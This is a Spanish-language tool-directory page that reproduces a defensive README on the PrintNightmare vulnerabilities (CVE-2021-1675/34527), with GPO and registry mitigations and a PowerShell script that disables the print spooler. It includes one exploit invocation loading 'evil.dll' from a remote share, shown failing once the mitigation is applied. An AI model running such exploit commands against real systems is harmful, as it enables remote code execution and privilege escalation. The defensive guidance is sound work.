Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-1675 — CVE-2021-1675 Información de detección | Kitploit
Herramientas/GitHubGitHub/laresllc/cve-2021-1675
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónAnálisis ForenseAprendizaje y EducaciónRespuesta a IncidentesRecursos Curados
GitHublaresllc/cve-2021-1675

CVE-2021-1675

CVE-2021-1675 Información de detección

Ver Repositorio
2143811hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

De Lares Labs: Información de Detección y Corrección para CVE-2021-1675 y CVE-2021-34527

🚨 Parche publicado:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Se ha confirmado que el parche corrige RCE, sin embargo la escalada de privilegios local parece no estar parcheada aún. Por lo tanto, las soluciones alternativas enumeradas a continuación siguen siendo recomendadas.

Este repositorio contiene una muestra EVTX del ataque CVE-2021-1675 y CVE-2021-34527, así como un archivo de configuración mínimo de Sysmon que puede utilizarse para generar la telemetría relevante.

Tenga en cuenta que estas reglas pueden ser eludidas; aplique los parches correspondientes y desactive el servicio de cola de impresión en los controladores de dominio.

Pruebe todas las correcciones recomendadas antes de implementarlas en producción, ya que estos cambios de endurecimiento pueden tener consecuencias no deseadas. Hemos redactado una publicación en el blog explicando el contenido de este repositorio y la información encontrada. Aquí: https://labs.lares.com/detection-and-mitigation-printnightmare/

Verificación de vulnerabilidad por Marcello https://twitter.com/byt3bl33d3r

  • https://twitter.com/byt3bl33d3r/status/1412798525323157504

  • https://github.com/byt3bl33d3r/ItWasAllADream

Diagrama de flujo

Gracias a Benjamin Delpy, hay un diagrama de flujo actualizado sobre la explotabilidad de este problema para determinar si sus sistemas son probablemente vulnerables.

Correcciones mostradas en el diagrama de flujo anterior

  1. GPO: Security Settings -> System Services -> Print Spooler -> Disable
    1. Registro: HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start = 4
  2. GPO: Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections -> Disable
    1. Registro: HKLM\Software\Policies\Microsoft\Windows NT\Printers\RegisterSpoolerRemoteRpcEndPoint = 2
  3. GPO: Printers -> Point and Print Restrictions -> Security Prompts -> When installing drivers for a new connection -> Show warning and elevation prompt
    1. Registro: HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint = 0
  4. Registro: HKLM\SOFTWARE\Microsoft\Windows\CurrrentVersion\Policies\System\EnableLUA = 1

Solución alternativa

El parche publicado por Microsoft en junio de 2021 sí corrige CVE-2021-1675, pero lamentablemente no soluciona el problema conocido como PrintNightmare (CVE-2021-34527). Por lo tanto, se puede aplicar una solución alternativa desactivando el servicio de cola de impresión. A continuación se explica cómo hacerlo tanto en GPO como en PowerShell. Se ha confirmado que el GPO corrige tanto la función MS-RPRN RpcAddPrinterDriverEx como la función Win32 AddPrinterDriverEx que utiliza SharpPrintNightmare.

GPO

El siguiente GPO se puede configurar para denegar las conexiones de clientes al spooler, lo que es una posible solución alternativa cuando desactivar completamente el servicio de cola de impresión no es una opción. Se ha probado contra controladores de dominio y endpoints (W7/W10) en un entorno de laboratorio y los usuarios aún pueden agregar/eliminar impresoras e imprimir, pero detiene la explotación. Nota: También se entiende que este GPO corrige CVE-2021-34527 según lo indicado en la página de vulnerabilidad de Microsoft.

Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections establecer en Deshabilitado:

Luego reinicie el servicio de cola de impresión en el host afectado. Si todo va bien, el exploit tendrá acceso denegado:

./CVE-2021-1675.py lares.labs/[email protected] '\\certer.lares.labs\share\evil.dll'                                                                                    1 ⨯
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.157[\PIPE\spoolss]
[-] Connection Failed

Eliminación de Usuarios Autenticados del Acceso Compatible Pre-Windows 2000

Otra corrección/solución alternativa es eliminar los usuarios autenticados del grupo Pre-Windows 2000 Compatible Access, según lo descubierto por Dirk-jan.

Asegúrese de que los grupos "Usuarios autenticados" no sean miembros del grupo "Acceso compatible con Pre-Windows 2000". (Por defecto, estos grupos no están incluidos en las versiones actuales de Windows.) como se muestra en la captura de pantalla siguiente, no debe haber miembros:

Si tiene dudas sobre cómo hacerlo, se pueden seguir los siguientes pasos:

  1. Abra "Usuarios y equipos de Active Directory" (disponible desde varios menús o ejecute "dsa.msc").
  2. Expanda el dominio que se está revisando en el panel izquierdo y seleccione el contenedor "Builtin".
  3. Haga doble clic en el grupo "Acceso compatible con Pre-Windows 2000" en el panel derecho.
  4. Seleccione la pestaña "Miembros".
  5. Si los grupos "Inicio de sesión anónimo", "Usuarios autenticados" o "Todos" son miembros, seleccione cada uno y haga clic en "Eliminar".

PowerShell

Adaptado el script de 0gtweet para usar ADDomainController y obtener todos los DC del dominio

# el script DETIENE y DESHABILITA el servicio de Cola de impresión (aka #PrintNightmare) en cada servidor de la lista siguiente SOLO SI SOLO EXISTEN IMPRESORAS PREDETERMINADAS.
# revertir si es necesario: vaya a services.msc, busque el servicio "print spooler", cambie el tipo de inicio a "automático" e inicie el servicio.
# Fuente: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
#
# Requisitos RSAT
# Get-Module -Name ActiveDirectory
# Import-Module -Name ActiveDirectory

$computers = Get-ADDomainController -filter * | %{ $_.name }

foreach ($computer in $computers)
{
    Write-Host "Processing $computer ..." 
    $service = Get-Service -ComputerName $computer -Name Spooler -ErrorAction SilentlyContinue
    if (!$service)
    {
        Write-Host "Cannot connect to Spooler Service on $computer. Skipping." -ForegroundColor Yellow
        continue
    }
    if ($service.Status -ne "Running")
    {
        Write-Host ("Service status is: """ + $service.Status + """. Skipping.") -ForegroundColor Yellow
        continue
    }
    $printers = (Get-WmiObject -class Win32_printer -ComputerName $computer)
    if (!$printers)
    {
        Write-Host "Cannot enumerate printers. Skipping." -ForegroundColor Yellow
        continue
    }

    $disableSpooler = $true
    foreach ($DriverName in ($printers.DriverName))
    {
        if (($DriverName -notmatch 'Microsoft XPS Document Writer') -and ($DriverName -notmatch 'Microsoft Print To PDF'))
        {
            Write-Host "  Printer found: $DriverName" -ForegroundColor Green
            $disableSpooler = $false
        }
    }
    if ($disableSpooler)
    {
        Write-Host "Only default printers found. Stopping and disabling spooler..." -ForegroundColor DarkCyan
        (Get-Service -ComputerName $computer -Name Spooler) | Stop-Service -Verbose
        Set-Service -ComputerName $computer -Name Spooler -StartupType Disabled -Verbose
Descargar herramienta